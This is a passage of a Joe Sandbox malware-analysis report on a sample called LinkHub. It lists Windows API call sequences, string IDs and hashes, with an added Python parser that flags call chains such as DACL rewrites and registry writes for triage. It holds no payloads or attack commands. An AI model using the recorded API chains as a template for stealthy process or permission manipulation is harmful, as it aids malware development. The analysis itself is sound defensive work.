• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0028D3C0
Strings
Memory Dump Source
• Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
Similarity
• API ID: Value$Close$_wcslen$ConnectCreateRegistry
• String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
• API String ID: 9721498-966354055
• Opcode ID: 17264e5552b5be267b5c3a02dac77830eb47ff4ff84d831b89601e0ff9a27a48
• Instruction ID: 24f4c380b75f0f415fbd70eec9e1456bfe8a1c5efa263768bb2242729e74393f
• Opcode Fuzzy Hash: 17264e5552b5be267b5c3a02dac77830eb47ff4ff84d831b89601e0ff9a27a48
• Instruction Fuzzy Hash: 6A1279356247019FDB14EF14C881A2AB7E5EF88714F14885DF98A9B3A2CB31EC56CF81
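The two entries above (the GetSecurityDescriptorDacl/AddAce/SetUserObjectSecurity function and the RegCreateKeyExW/RegSetValueExW function) are the kind of function-level output an analyst pivots on, but the report gives them only as flat text. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses entries in this layout into records, checks each for an ordered API chain (the user-object DACL rewrite, and the registry write), and decodes the dwType argument of every resolved RegSetValueExW call, which yields the same REG_* names the report lists in that function's String ID. The sample text is constructed from those two entries with lines trimmed; the chain labels and the REG_TYPES table are this example's own.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: two function entries from the report above, in the layout Joe Sandbox
# uses for function-level output (some lines trimmed; the values are the page's own).
SAMPLE = """\
APIs
  • Part of subcall function 00261A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00261A60
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00261741
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00261775
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002617E2
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0026185F
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00261881
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00261893
Memory Dump Source
• Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
Similarity
• String ID:
• Opcode ID: eb20bd7b282f84961fe3e336c2916829c64ae324c407253cc6ca07f01cbf33e0
• Instruction ID: e309cc01db9b955f24c2807838c0066719fc7ae14e7bee501c14cfd297abed95
• Instruction Fuzzy Hash: FF714E72D1020AAFEF10DFA5EC49FAEBBB8BF44350F184125F915A7190D731AA65CB60
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0028CF1D
• RegCreateKeyExW.ADVAPI32(?,?,00000000,0029DCD0,00000000,?,00000000,?,?), ref: 0028CFA4
• _wcslen.LIBCMT ref: 0028D054
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0028D112
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0028D221
• RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0028D2AD
• RegCloseKey.ADVAPI32(?), ref: 0028D2E1
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0028D3C0
Strings
Similarity
• String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
• Opcode ID: 17264e5552b5be267b5c3a02dac77830eb47ff4ff84d831b89601e0ff9a27a48
• Instruction ID: 24f4c380b75f0f415fbd70eec9e1456bfe8a1c5efa263768bb2242729e74393f
• Instruction Fuzzy Hash: 6A1279356247019FDB14EF14C881A2AB7E5EF88714F14885DF98A9B3A2CB31EC56CF81
"""

# "• Name.MODULE(args), ref: ADDR"; the parentheses are absent for CRT calls such as _wcslen.
API_RE = re.compile(
    r"^•\s+(?P<sub>Part of subcall function [0-9A-F]+: )?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$"
)
KV_RE = re.compile(r"^•\s+(?P<key>[^:]+):\s*(?P<val>.*)$")   # "• Opcode ID: ..." style lines


@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple
    ref: str
    subcall: bool          # True for "Part of subcall function ..." lines


@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)   # key/value lines from the other sections


def parse_entries(text):
    """Split function-level report text into entries; each one starts at an 'APIs' header."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionEntry()
            entries.append(cur)
        elif cur is not None and line.startswith("•"):
            m = API_RE.match(line)
            if m:
                args = tuple(a for a in (m.group("args") or "").split(",") if a)
                cur.apis.append(ApiCall(m.group("name"), m.group("module"), args,
                                        m.group("ref"), m.group("sub") is not None))
            else:
                m = KV_RE.match(line)
                if m:
                    cur.fields[m.group("key").strip()] = m.group("val").strip()
    return entries


def api_chain(entry, include_subcalls=False):
    """API names in call order; subcall lines are left out unless asked for."""
    return [c.name for c in entry.apis if include_subcalls or not c.subcall]


def contains_chain(entry, chain):
    """True if every API in `chain` occurs in the entry, in that order (other calls may sit between)."""
    it = iter(api_chain(entry))
    return all(any(name == want for name in it) for want in chain)


# Call sequences worth flagging at triage; the labels are this example's own, not the report's.
CHAINS = {
    "user-object DACL rewrite (grant access to a window station or desktop)":
        ["GetSecurityDescriptorDacl", "AddAce", "SetSecurityDescriptorDacl", "SetUserObjectSecurity"],
    "registry value write": ["RegCreateKeyExW", "RegSetValueExW"],
}


def flag_entries(entries):
    """Map Opcode ID -> matched chain labels for every entry that matches at least one chain."""
    hits = {}
    for e in entries:
        labels = [lbl for lbl, chain in CHAINS.items() if contains_chain(e, chain)]
        if labels:
            hits[e.fields.get("Opcode ID", "?")] = labels
    return hits


REG_TYPES = {1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY", 4: "REG_DWORD",
             7: "REG_MULTI_SZ", 11: "REG_QWORD"}   # winnt.h value-type constants


def reg_value_types(entry):
    """Decode dwType (4th argument) of each RegSetValueExW call whose value the report resolved."""
    out = []
    for c in entry.apis:
        if c.name == "RegSetValueExW" and len(c.args) >= 4 and c.args[3] != "?":
            t = int(c.args[3], 16)
            out.append(REG_TYPES.get(t, "REG_%d" % t))
    return out


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    for e in parsed:
        print(e.fields.get("Opcode ID", "?")[:16], api_chain(e), reg_value_types(e))
    print(flag_entries(parsed))
```

Subcall lines are excluded from chain matching by default because they belong to a callee, not to the function whose hashes the entry carries; pass include_subcalls=True when the callee's behaviour is what you want to key on.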
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00291462
                                                                                        • _wcslen.LIBCMT ref: 0029149D
                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002914F0
                                                                                        • _wcslen.LIBCMT ref: 00291526
                                                                                        • _wcslen.LIBCMT ref: 002915A2
                                                                                        • _wcslen.LIBCMT ref: 0029161D
                                                                                          • Part of subcall function 0021FD52: _wcslen.LIBCMT ref: 0021FD5D
                                                                                          • Part of subcall function 00263535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00263547
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                        • API String ID: 1103490817-4258414348
                                                                                        Similarity
                                                                                        • API ID: _wcslen$BuffCharUpper
                                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                        • API String ID: 1256254125-909552448
                                                                                        APIs
                                                                                        • _wcslen.LIBCMT ref: 00298DB5
                                                                                        • _wcslen.LIBCMT ref: 00298DC9
                                                                                        • _wcslen.LIBCMT ref: 00298DEC
                                                                                        • _wcslen.LIBCMT ref: 00298E0F
                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00298E4D
                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00296691), ref: 00298EA9
                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00298EE2
                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00298F25
                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00298F5C
                                                                                        • FreeLibrary.KERNEL32(?), ref: 00298F68
                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00298F78
                                                                                        • DestroyIcon.USER32(?,?,?,?,?,00296691), ref: 00298F87
                                                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00298FA4
                                                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00298FB0
                                                                                        Similarity
                                                                                        • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                        • String ID: .dll$.exe$.icl
                                                                                        • API String ID: 799131459-1154884017
                                                                                        APIs
                                                                                        • CharLowerBuffW.USER32(?,?), ref: 0027493D
                                                                                        • _wcslen.LIBCMT ref: 00274948
                                                                                        • _wcslen.LIBCMT ref: 0027499F
                                                                                        • _wcslen.LIBCMT ref: 002749DD
                                                                                        • GetDriveTypeW.KERNEL32(?), ref: 00274A1B
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00274A63
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00274A9E
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00274ACC
                                                                                        Similarity
                                                                                        • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                        • API String ID: 1839972693-4113822522
                                                                                        APIs
                                                                                        • LoadIconW.USER32(00000063), ref: 00266395
                                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 002663A7
                                                                                        • SetWindowTextW.USER32(?,?), ref: 002663BE
                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 002663D3
                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 002663D9
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 002663E9
                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 002663EF
                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00266410
                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0026642A
                                                                                        • GetWindowRect.USER32(?,?), ref: 00266433
                                                                                        • _wcslen.LIBCMT ref: 0026649A
                                                                                        • SetWindowTextW.USER32(?,?), ref: 002664D6
                                                                                        • GetDesktopWindow.USER32 ref: 002664DC
                                                                                        • GetWindowRect.USER32(00000000), ref: 002664E3
                                                                                        • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 0026653A
                                                                                        • GetClientRect.USER32(?,?), ref: 00266547
                                                                                        • PostMessageW.USER32(?,00000005,00000000,?), ref: 0026656C
                                                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00266596
                                                                                        Similarity
                                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 895679908-0
                                                                                        APIs
                                                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 00280884
                                                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 0028088F
                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0028089A
                                                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 002808A5
                                                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 002808B0
                                                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 002808BB
                                                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 002808C6
                                                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 002808D1
                                                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 002808DC
                                                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 002808E7
                                                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 002808F2
                                                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 002808FD
                                                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 00280908
                                                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00280913
                                                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 0028091E
                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00280929
                                                                                        • GetCursorInfo.USER32(?), ref: 00280939
                                                                                        • GetLastError.KERNEL32 ref: 0028097B
                                                                                        Similarity
                                                                                        • API ID: Cursor$Load$ErrorInfoLast
                                                                                        • String ID:
                                                                                        • API String ID: 3215588206-0
                                                                                        Similarity
                                                                                        • API ID: _wcslen
                                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$k,
                                                                                        • API String ID: 176396367-228593006
                                                                                        APIs
                                                                                        • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00220436
                                                                                          • Part of subcall function 0022045D: InitializeCriticalSectionAndSpinCount.KERNEL32(002D170C,00000FA0,E9A0270B,?,?,?,?,00242733,000000FF), ref: 0022048C
                                                                                          • Part of subcall function 0022045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00242733,000000FF), ref: 00220497
                                                                                          • Part of subcall function 0022045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00242733,000000FF), ref: 002204A8
                                                                                          • Part of subcall function 0022045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 002204BE
                                                                                          • Part of subcall function 0022045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 002204CC
                                                                                          • Part of subcall function 0022045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 002204DA
                                                                                          • Part of subcall function 0022045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00220505
                                                                                          • Part of subcall function 0022045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00220510
                                                                                        • ___scrt_fastfail.LIBCMT ref: 00220457
                                                                                          • Part of subcall function 00220413: __onexit.LIBCMT ref: 00220419
                                                                                        Strings
                                                                                        • WakeAllConditionVariable, xrefs: 002204D2
                                                                                        • SleepConditionVariableCS, xrefs: 002204C4
                                                                                        • InitializeConditionVariable, xrefs: 002204B8
                                                                                        • kernel32.dll, xrefs: 002204A3
                                                                                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00220492
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                        • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                        • API String ID: 66158676-1714406822
                                                                                        APIs
                                                                                        • CharLowerBuffW.USER32(00000000,00000000,0029DCD0), ref: 00274F6C
                                                                                        • _wcslen.LIBCMT ref: 00274F80
                                                                                        • _wcslen.LIBCMT ref: 00274FDE
                                                                                        • _wcslen.LIBCMT ref: 00275039
                                                                                        • _wcslen.LIBCMT ref: 00275084
                                                                                        • _wcslen.LIBCMT ref: 002750EC
                                                                                          • Part of subcall function 0021FD52: _wcslen.LIBCMT ref: 0021FD5D
                                                                                        • GetDriveTypeW.KERNEL32(?,002C7C10,00000061), ref: 00275188
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$BuffCharDriveLowerType
                                                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                        • API String ID: 2055661098-1000479233
                                                                                        • Opcode ID: 2edbbc66982a0a1f0a4c02a005591d2de89e86f732342875305f243e6fe3ab13
                                                                                        • Instruction ID: d56a90c35a7491aca42a88b7a388d1972051a3c33a76d8a287dc818111eb2744
                                                                                        • Opcode Fuzzy Hash: 2edbbc66982a0a1f0a4c02a005591d2de89e86f732342875305f243e6fe3ab13
                                                                                        • Instruction Fuzzy Hash: 9EB1C5316287129FC710EF28C890A6BF7E5BFA4714F50891DF59987292DBB0DC64CB92
                                                                                        APIs
                                                                                        • _wcslen.LIBCMT ref: 0028BBF8
                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0028BC10
                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0028BC34
                                                                                        • _wcslen.LIBCMT ref: 0028BC60
                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0028BC74
                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0028BC96
                                                                                        • _wcslen.LIBCMT ref: 0028BD92
                                                                                          • Part of subcall function 00270F4E: GetStdHandle.KERNEL32(000000F6), ref: 00270F6D
                                                                                        • _wcslen.LIBCMT ref: 0028BDAB
                                                                                        • _wcslen.LIBCMT ref: 0028BDC6
                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0028BE16
                                                                                        • GetLastError.KERNEL32(00000000), ref: 0028BE67
                                                                                        • CloseHandle.KERNEL32(?), ref: 0028BE99
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0028BEAA
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0028BEBC
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0028BECE
                                                                                        • CloseHandle.KERNEL32(?), ref: 0028BF43
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 2178637699-0
                                                                                        • Opcode ID: 5ade794fd528176876d0474244c532816aa39717ef1895e8ee4d96467ddefb2c
                                                                                        • Instruction ID: b41c6b24bd2c10e32e6df8d3ff071c059d690a3111c889a77f97a7f2fe8f61a3
                                                                                        • Opcode Fuzzy Hash: 5ade794fd528176876d0474244c532816aa39717ef1895e8ee4d96467ddefb2c
                                                                                        • Instruction Fuzzy Hash: 93F1CD75525301AFC715EF24C891B6ABBE1AF84314F18895DF8898B2E2CB70EC65CF52
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0029DCD0), ref: 00284B18
                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00284B2A
                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,0029DCD0), ref: 00284B4F
                                                                                        • FreeLibrary.KERNEL32(00000000,?,0029DCD0), ref: 00284B9B
                                                                                        • StringFromGUID2.OLE32(?,?,00000028,?,0029DCD0), ref: 00284C05
                                                                                        • SysFreeString.OLEAUT32(00000009), ref: 00284CBF
                                                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00284D25
                                                                                        • SysFreeString.OLEAUT32(?), ref: 00284D4F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                                                        • API String ID: 354098117-199464113
                                                                                        • Opcode ID: 94c22220322c1424bb5090c78fa41e0541b5f97b36424474d09627779612b016
                                                                                        • Instruction ID: 829772deb7146c47f5245e576e5a4fdbad4750674a47d3ce1c1474d5d354ee35
                                                                                        • Opcode Fuzzy Hash: 94c22220322c1424bb5090c78fa41e0541b5f97b36424474d09627779612b016
                                                                                        • Instruction Fuzzy Hash: 80127D75A11206EFDB14EF54C888EAEB7B9FF45308F148099F9099B291C731ED52CBA0
                                                                                        APIs
                                                                                        • GetMenuItemCount.USER32(002D29C0), ref: 00243F72
                                                                                        • GetMenuItemCount.USER32(002D29C0), ref: 00244022
                                                                                        • GetCursorPos.USER32(?), ref: 00244066
                                                                                        • SetForegroundWindow.USER32(00000000), ref: 0024406F
                                                                                        • TrackPopupMenuEx.USER32(002D29C0,00000000,?,00000000,00000000,00000000), ref: 00244082
                                                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0024408E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                        • String ID: 0
                                                                                        • API String ID: 36266755-4108050209
                                                                                        • Opcode ID: 9a66fb3f336623b043d48e5eef3128d0b2a56f3c74e34e6c81d2d02c9a81bf2b
                                                                                        • Instruction ID: 8b14382351edf1850843adb337efdbed9211fc81fc0a4ade75ee270b33b016e3
                                                                                        • Opcode Fuzzy Hash: 9a66fb3f336623b043d48e5eef3128d0b2a56f3c74e34e6c81d2d02c9a81bf2b
                                                                                        • Instruction Fuzzy Hash: 9071F530654306BAEB25DF28DC49FAABF68FF05364F104216F5146A1D1C7B1AD34DB50
                                                                                        APIs
                                                                                        • DestroyWindow.USER32(00000000,?), ref: 00297823
                                                                                          • Part of subcall function 00208577: _wcslen.LIBCMT ref: 0020858A
                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00297897
                                                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 002978B9
                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002978CC
                                                                                        • DestroyWindow.USER32(?), ref: 002978ED
                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00200000,00000000), ref: 0029791C
                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00297935
                                                                                        • GetDesktopWindow.USER32 ref: 0029794E
                                                                                        • GetWindowRect.USER32(00000000), ref: 00297955
                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0029796D
                                                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00297985
                                                                                          • Part of subcall function 00202234: GetWindowLongW.USER32(?,000000EB), ref: 00202242
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                        • String ID: 0$tooltips_class32
                                                                                        • API String ID: 2429346358-3619404913
                                                                                        • Opcode ID: 9b3266ea0bd8f6fd02550ee808bde07883395368e944ec243568aa0612016910
                                                                                        • Instruction ID: aff9d7424e60b9d8ccaaec4f67e777b95020107bb65e4c569c1a0860ba41ceb8
                                                                                        • Opcode Fuzzy Hash: 9b3266ea0bd8f6fd02550ee808bde07883395368e944ec243568aa0612016910
                                                                                        • Instruction Fuzzy Hash: A5718870528345AFEB25CF58DC48FAABBF9FB89300F14445EF989872A1C770A916DB11
                                                                                        APIs
                                                                                          • Part of subcall function 00201802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00201488,?,00000000,?,?,?,?,0020145A,00000000,?), ref: 00201865
                                                                                        • DestroyWindow.USER32(?), ref: 00201521
                                                                                        • KillTimer.USER32(00000000,?,?,?,?,0020145A,00000000,?), ref: 002015BB
                                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 002429B4
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,0020145A,00000000,?), ref: 002429E2
                                                                                        • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,0020145A,00000000,?), ref: 002429F9
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0020145A,00000000), ref: 00242A15
                                                                                        • DeleteObject.GDI32(00000000), ref: 00242A27
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
